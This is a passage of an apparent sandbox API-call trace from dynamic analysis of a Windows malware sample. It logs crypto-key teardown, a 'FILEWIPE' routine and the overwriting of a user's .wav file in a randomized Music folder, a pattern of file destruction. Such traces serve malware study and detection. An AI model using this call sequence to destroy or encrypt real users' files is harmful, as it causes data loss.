lpMsg=0x87f36c) returned 0 [0184.114] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.115] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0184.115] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.115] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0184.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.115] CryptDestroyKey (hKey=0x90af98) returned 1 [0184.115] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.115] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.115] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.116] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.116] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.116] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.116] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.116] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.116] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.116] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.116] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.116] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.116] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.117] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.117] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.117] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.117] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.117] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.117] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.117] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0184.117] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.117] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.117] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.117] FreeLibrary (hLibModule=0x74f20000) returned 1 [0184.117] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.117] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.117] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.122] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.123] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0184.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.123] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0xfe7dc3e0, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 0x90af58 [0184.124] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.124] CharLowerBuffW (in: lpsz="byte[43092]", cchLength=0xb | out: lpsz="byte[43092]") returned 0xb [0184.126] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.126] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0184.126] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.126] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0184.126] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0184.126] FreeLibrary (hLibModule=0x75c90000) returned 1 [0184.126] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.127] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.128] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0184.128] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\7ihrod3g.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0184.129] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.129] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.129] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0184.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.129] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0184.130] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.130] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0184.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd8b8 [0184.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd8b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.131] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0184.131] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xa854, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xa854, lpOverlapped=0x0) returned 1 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.134] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) 